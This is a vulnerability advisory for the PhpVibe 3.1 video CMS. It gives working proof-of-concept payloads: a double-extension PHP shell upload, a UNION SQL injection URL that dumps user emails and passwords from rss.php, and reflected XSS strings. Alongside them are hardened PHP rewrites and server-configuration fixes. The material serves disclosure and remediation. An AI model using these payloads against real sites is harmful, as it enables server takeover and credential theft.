PhpVibe 3.1 - Multiple Vulnerabilities
2013-08-26 10:05:13
###########################################################################################
#Exploit Title: PhpVibe 3.1 - Multiple Vulnerabilities
#Product: PhpVibe
#Official site: http://phprevolution.com/
#Risk Level: High
#Exploit Author: Esac
#Last Checked: 23/08/2013
###########################################################################################
+----------+
| OVERVIEW |
+----------+
PhpVibe is a premium video sharing CMS with or without upload. It supports all the main video sharing websites (YouTube, Vimeo, Dailymotion, Metacafe) as well as flv, mp4 and mp3 uploads. No ffmpeg is required, and the upload option can be turned off.
+-----------------------------------------------------------------------------------+
+-------------------------------------+
| Remote Arbitrary File Upload Vuln |
+-------------------------------------+
Affected file : upload.php
...............................................
if ($_FILES['file']['name'] != '') {
    $fileName = $_FILES['file']['name'];
    $fileSize = $_FILES['file']['size'];
    // Only the text after the LAST dot is checked, so "evil.php.mp3" yields "mp3"
    $ext = substr($fileName, strrpos($fileName, '.') + 1);
    // An empty whitelist means every extension is accepted
    if (in_array($ext, $allowedExts) or empty($allowedExts)) {
        if ($fileSize < $maxFileSize or empty($maxFileSize)) {
            // The client-supplied file name is kept unchanged on disk
            $target_path = $target_path . basename($_FILES['file']['name']);
            if (move_uploaded_file($_FILES['file']['tmp_name'], $target_path)) {
                echo '{"success":true, "file": "'.$target_path.'"}';
                vinsert(basename($_FILES['file']['name']), basename($_FILES['file']['name']));
            } else {
                echo '{"success":false, "details": "move_uploaded_file failed"}';
            }
        } else { echo('{"success":false, "details": "Maximum file size: '.ByteSize($maxFileSize).'."}'); };
    } else echo('{"success":false, "details": "File type '.$ext.' not allowed."}');
} else echo '{"success":false, "details": "No file received."}';
Exploitation:
To exploit this vulnerability you must be a registered user. Go to the video upload area
http://server/upload
and upload the file with a double extension such as evil.php.mp3, file.php.mp4 or file.php.flv. upload.php only checks the text after the last dot, so the file is accepted and stored under its original name.
Shell access:
http://host/media/flv/month-date-year-time-minute-pm/am-file.php.mp3
Demo:
server/media/flv/august-23-13-5-10-pm-evil.php.flv
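As an added example (not PhpVibe's own code), this is the hardened form of the upload logic quoted above: the whole file name is inspected rather than the text after the last dot, an empty whitelist rejects everything instead of allowing everything, the content is checked against the claimed type, and the file is stored under a random name outside the web root. The function name, the MIME mapping and the storage directory are assumptions.

```php
<?php
// Added example, not PhpVibe code. Assumptions: $allowedExts and $maxFileSize are
// configured by the caller, and $storageDir lies OUTSIDE the web root so nothing
// in it can be requested (or executed) directly; files are served by a download script.

function safe_upload(array $file, array $allowedExts, int $maxFileSize, string $storageDir): array
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return ['success' => false, 'details' => 'No file received.'];
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        return ['success' => false, 'details' => 'Not an uploaded file.'];
    }
    if ($maxFileSize <= 0 || $file['size'] > $maxFileSize) {
        return ['success' => false, 'details' => 'Maximum file size exceeded.'];
    }

    // Look at the WHOLE client-supplied name, not only the part after the last dot:
    // "evil.php.mp3" has two extensions and is rejected here.
    $name  = basename($file['name']);
    $parts = explode('.', $name);
    if (count($parts) !== 2 || $parts[0] === '') {
        return ['success' => false, 'details' => 'File name must have exactly one extension.'];
    }
    $ext = strtolower($parts[1]);
    // An empty whitelist denies everything (the original treated it as "allow all").
    if ($allowedExts === [] || !in_array($ext, $allowedExts, true)) {
        return ['success' => false, 'details' => "File type $ext not allowed."];
    }

    // Check the content type from the bytes, not from the client's Content-Type.
    // Assumed libmagic results for the three formats; tune for your PHP build.
    $expected = ['mp3' => ['audio/mpeg'], 'mp4' => ['video/mp4'], 'flv' => ['video/x-flv']];
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset($expected[$ext]) || !in_array($mime, $expected[$ext], true)) {
        return ['success' => false, 'details' => 'File content does not match its extension.'];
    }

    // Never reuse the client's name on disk: a random name means the uploader
    // neither controls the stored name nor can guess the resulting URL.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $target = rtrim($storageDir, '/') . '/' . $stored;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return ['success' => false, 'details' => 'move_uploaded_file failed'];
    }
    chmod($target, 0640); // data only, never executable
    return ['success' => true, 'file' => $stored, 'original' => $name];
}

// Typical call from upload.php (limits and path are placeholders):
// header('Content-Type: application/json');
// echo json_encode(safe_upload($_FILES['file'], ['mp3', 'mp4', 'flv'], 50 * 1024 * 1024, '/var/phpvibe-uploads'));
```

The double extension works against the original code because Apache's mod_mime treats every dot-separated part of a name as an extension, so with `AddHandler` mapping `.php`, a file called `file.php.mp3` is still run as PHP. Independently of the application fix, the media directory should therefore have PHP execution disabled (for example `php_admin_flag engine off` for that directory, or a `<FilesMatch "\.php$">` SetHandler rule so only names ending exactly in `.php` are handled by PHP).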
+-----------------------------------------------------------------------------------+
+---------------+
| SQL Injection |
+---------------+
PhpVibe is possibly vulnerable to SQL injection. Affected file: rss.php, parameter: cat, which is concatenated into the query without escaping.
Affected code:
// rss.php, line 24
function clean_feed($input)
{
    $original = array("<", ">", "&", '"', "'", "<br/>", "<br>");
    $replaced = array("&lt;", "&gt;", "&amp;", "&quot;", "&#39;", "", "");
    $newinput = str_replace($original, $replaced, $input);
    return $newinput;
}
echo '<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
<channel>
';
echo '
<title>Download</title>
<description>'.$seo_desc.'</description>
<link>'.$site_url.'</link>
';
if ($cat = MK_Request::getQuery('cat')) {
    // $cat comes straight from the query string and is concatenated into the SQL
    $vbox_result = dbquery("select * from videos WHERE category ='".$cat."' > 0 ORDER BY id DESC limit 0, 30");
} else {
    $vbox_result = dbquery("select * from videos WHERE views > 0 ORDER BY id DESC limit 0, 30");
}
while ($videosData = mysql_fetch_array($vbox_result))
{
    $url = $site_url.'video/'.$videosData["id"].'/'.seo_clean_url($videosData['title']).'/';
    $rss_datetime = $videosData["date"];
    echo '
<item>
<title>'.strip_tags($videosData['title']).'</title>
<link><![CDATA['.$url.']]></link>
<guid><![CDATA['.$url.']]></guid>
<pubDate>'.$rss_datetime.'</pubDate>
<description>[CDATA['.clean_feed($videosData["description"]).' ]]</description>
</item>
';
}
echo '</channel>
PoC:
http://server/rss.php?cat=-1+union+select+concat_ws(id,email,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users--
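As an added example (not PhpVibe's own code), the feed query above rewritten so that cat is sent as a bound parameter instead of being spliced into the statement, with the XML output escaped by htmlspecialchars rather than the hand-rolled clean_feed(). The PDO handle, the function names, the column list and the slug helper are assumptions.

```php
<?php
// Added example, not PhpVibe code. Assumptions: $pdo is a PDO connection to the
// PhpVibe database, the "videos" table has the columns used by rss.php, and
// categories are stored as short text values (adjust the check if they are ids).

function open_db(string $dsn, string $user, string $pass): PDO
{
    return new PDO($dsn, $user, $pass, [
        PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
        // Real server-side prepares: the driver never builds SQL text from the value.
        PDO::ATTR_EMULATE_PREPARES   => false,
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ]);
}

function fetch_feed_videos(PDO $pdo, ?string $cat): array
{
    // Same branching as the original: filter by category when ?cat= is given,
    // otherwise list the most recent viewed videos.
    if ($cat !== null && $cat !== '') {
        // Reject anything that cannot be a category name before it reaches the DB.
        if (!preg_match('/\A[\w-]{1,64}\z/', $cat)) {
            return [];
        }
        $stmt = $pdo->prepare(
            'SELECT id, title, `date`, description FROM videos
              WHERE category = :cat ORDER BY id DESC LIMIT 30'
        );
        // The value travels separately from the statement, so a string such as
        // "-1 UNION SELECT ..." is compared literally with the category column.
        $stmt->bindValue(':cat', $cat, PDO::PARAM_STR);
    } else {
        $stmt = $pdo->prepare(
            'SELECT id, title, `date`, description FROM videos
              WHERE views > 0 ORDER BY id DESC LIMIT 30'
        );
    }
    $stmt->execute();
    return $stmt->fetchAll();
}

function xml_text(string $s): string
{
    // Escape for XML text and attribute content; replaces clean_feed().
    return htmlspecialchars($s, ENT_QUOTES | ENT_XML1, 'UTF-8');
}

function render_feed(array $rows, string $siteUrl, string $seoDesc): string
{
    $out = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<rss version=\"2.0\">\n<channel>\n"
         . '<title>Download</title>'
         . '<description>' . xml_text($seoDesc) . '</description>'
         . '<link>' . xml_text($siteUrl) . "</link>\n";
    foreach ($rows as $row) {
        // Simple slug in place of the original seo_clean_url() (assumed equivalent)
        $slug = trim(preg_replace('/[^a-z0-9]+/', '-', strtolower($row['title'])), '-');
        $url  = $siteUrl . 'video/' . (int)$row['id'] . '/' . $slug . '/';
        $out .= "<item>\n"
              . '<title>' . xml_text(strip_tags($row['title'])) . "</title>\n"
              . '<link>' . xml_text($url) . "</link>\n"
              . '<guid>' . xml_text($url) . "</guid>\n"
              . '<pubDate>' . xml_text($row['date']) . "</pubDate>\n"
              . '<description>' . xml_text($row['description']) . "</description>\n"
              . "</item>\n";
    }
    return $out . "</channel>\n</rss>\n";
}

// Typical use inside rss.php (connection details are placeholders):
// $pdo = open_db('mysql:host=localhost;dbname=phpvibe;charset=utf8mb4', 'user', 'pass');
// header('Content-Type: application/rss+xml; charset=utf-8');
// echo render_feed(fetch_feed_videos($pdo, $_GET['cat'] ?? null), $site_url, $seo_desc);
```

With this change the PoC above returns an empty feed: the value fails the category-name check, and even without that check it would only ever be compared as a string, so no UNION against the users table is possible. The fixed column list also removes the `select *` that made the 16-column UNION line up with the original query.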
+--------------------------------------------------------------------------------------+
+-----------+
|XSS Attack |
+-----------+
Multiple XSS vulnerabilities have been detected in phpVibe 3.1.
1) Input appended via the URL to show/ is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.
Example:
http://server/show/'">><marquee><h1>XSS</h1></marquee>
2) Input passed to the "email" parameter in forgot-pass.php, login.php, and register.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.
The vulnerabilities are reported in version 3.1. Other versions may also be affected.
Example:
http://server/forgot-pass.php => POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee>
http://server/login.php => POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee>
http://server/register.php => POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee>
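As an added example (not PhpVibe's own code), the two reflection points described above handled the way they should be: the e-mail value is validated and then output-encoded with ENT_QUOTES so the single and double quotes in the payload cannot break out of the attribute, and the show/ handler only reflects a value that matches a tight allow-list. The function names, the form markup and the assumption that show/ takes a numeric id are mine, not the project's.

```php
<?php
// Added example, not PhpVibe code. Assumptions: forgot-pass.php, login.php and
// register.php re-display the submitted e-mail in an <input> field, and the
// show/ handler prints part of the requested path in the page body.

function e(string $s): string
{
    // ENT_QUOTES encodes both ' and ", so the advisory's '">> payload can close
    // neither the attribute nor the tag it lands in; ENT_SUBSTITUTE stops invalid
    // UTF-8 from turning the whole output into an empty string.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function read_email(array $post): array
{
    // Validate first: anything that is not an e-mail address is rejected outright.
    $raw   = isset($post['email']) ? (string) $post['email'] : '';
    $valid = filter_var($raw, FILTER_VALIDATE_EMAIL);
    return [
        'ok'    => $valid !== false,
        'value' => $valid !== false ? $valid : $raw,
    ];
}

function render_email_field(array $post): string
{
    $email = read_email($post);
    // The only user-controlled text in this markup passes through e().
    $html  = '<input type="email" name="email" value="' . e($email['value']) . '">';
    if (!$email['ok'] && $email['value'] !== '') {
        $html .= '<p class="error">Please enter a valid e-mail address.</p>';
    }
    return $html;
}

function render_show_page(string $requestPath): string
{
    // Assumed: show/<id> takes a numeric video id. Anything else is not reflected
    // at all, which removes the first XSS sink entirely.
    if (!preg_match('#\A/show/(\d+)\z#', $requestPath, $m)) {
        return '<h1>Not found</h1>';
    }
    return '<h1>Video ' . e($m[1]) . '</h1>';
}

function send_security_headers(): void
{
    // Site-wide backstop: a CSP without 'unsafe-inline' blocks injected inline
    // script even if one reflection point is missed.
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'");
    header('X-Content-Type-Options: nosniff');
}

// Demonstration with the advisory's payload as constructed input (no request needed):
$constructed = ['email' => '\'">><marquee><h1>XSS</h1></marquee>'];
echo render_email_field($constructed), "\n";
echo render_show_page('/show/\'">><marquee>'), "\n";
```

Run from the command line, the first echo shows the payload rendered as inert text inside the value attribute (quotes and angle brackets as entities) followed by the validation error, and the second shows only the static "Not found" heading.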
+--------------------------------------------------------------------------------------+
Knowledge is not an object, it's a flaw :)
Greetz: White Tarbouch TEAM - Cobra
www.Iss4m.ma
./Issam IEBOUBEN Aka Esac